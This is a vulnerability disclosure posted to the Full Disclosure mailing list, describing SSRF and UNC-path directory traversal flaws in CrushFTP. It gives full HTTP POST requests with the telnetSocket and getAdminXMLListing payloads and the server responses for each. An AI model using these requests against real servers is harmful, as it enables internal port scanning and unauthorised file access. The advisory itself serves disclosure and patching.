[CVE-2025-32102, CVE-2025-32103] SSRF and Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)

[Rafael Pedrero <rafael.pedrero () gmail com>]

<!--
# Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and
11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32102
# Vulnerability: CWE-918
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
via the host and port parameters in a command=telnetSocket request to the
/WebInterface/function/ URI.

2. Proof of Concept

The application has a form to establish telnet connections. The parameters
where the target is entered are host and port, for example,
"host=127.0.0.1&port=8080". It can be used to scan remote ports, as it
receives the string "Connected" if it connects successfully, whereas it
receives "Connection%20refused" if it does not connect

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq

Open port: 8080
<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
</data></response></commandResult>

Close port: 8888
<commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
(/127.0.0.1)</error>Error:java.lang.NullPointerException
</response></commandResult>


3. Solution:

Update to last version this product.

-->
<!--
# Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well
as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32103
# Vulnerability: CWE-40
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
directory traversal via the /WebInterface/function/ URI to read files
accessible by SMB at UNC share pathnames, bypassing SecurityManager
restrictions.

2. Proof of Concept

The application's logic does not account for the fact that, when listing
directories or files, the path can be modified to allow UNC paths from
another machine on the network or on the internet instead of local files.
An attacker injects a UNC path (\server\resource) instead of a local path
(such as C:/PATH) and gains access to remote directories or files. This is
more specific than typical Path Traversal and occurs when network paths are
not properly filtered or restricted.

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq

<?xml version="1.0" encoding="UTF-8"?>
<listingInfo type="properties">
<path>////vboxsrv/demo/</path>
<privs>(read)(view)</privs>
<listing>l = new Array();
lp = {};
lp.name="directorio1";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio1";
lp.privs="(read)(view)";
lp.size="0";
lp.modified="0";
lp.created="null";
l[l.length] = lp;
lp = {};
lp.name="directorio2";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio2";
...


The vulnerable parameter is path, where the local path can be changed to a
remote path, thereby displaying remote directories. This could later be
used for potential file downloads within those directories, just as it
would if they were local.


3. Solution:

Update to last version this product.

-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/